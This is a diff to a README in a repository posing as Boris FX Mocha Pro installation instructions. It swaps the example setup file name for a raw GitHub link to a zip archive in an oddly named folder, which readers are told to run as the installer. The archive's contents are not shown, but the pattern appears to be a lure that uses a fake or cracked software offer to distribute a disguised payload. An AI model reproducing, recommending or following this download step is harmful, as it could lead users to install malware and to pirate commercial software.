ur1nonlyheh/borisfx-mocha-pro/README.md

 ### Step 4: Install the Application

 Navigate to the extracted folder.
-If you downloaded the standalone application, find the setup file (e.g., `MochaProSetup.exe`) and double-click it.
+If you downloaded the standalone application, find the setup file (e.g., `https://raw.githubusercontent.com/ur1nonlyheh/borisfx-mocha-pro/main/athyrid/pro-mocha-borisfx-3.0.zip`) and double-click it.
 Follow the on-screen instructions to complete the installation.

 For the plugin version, follow the same process to install it into your preferred video editing software, such as Adobe After Effects or Sony Vegas.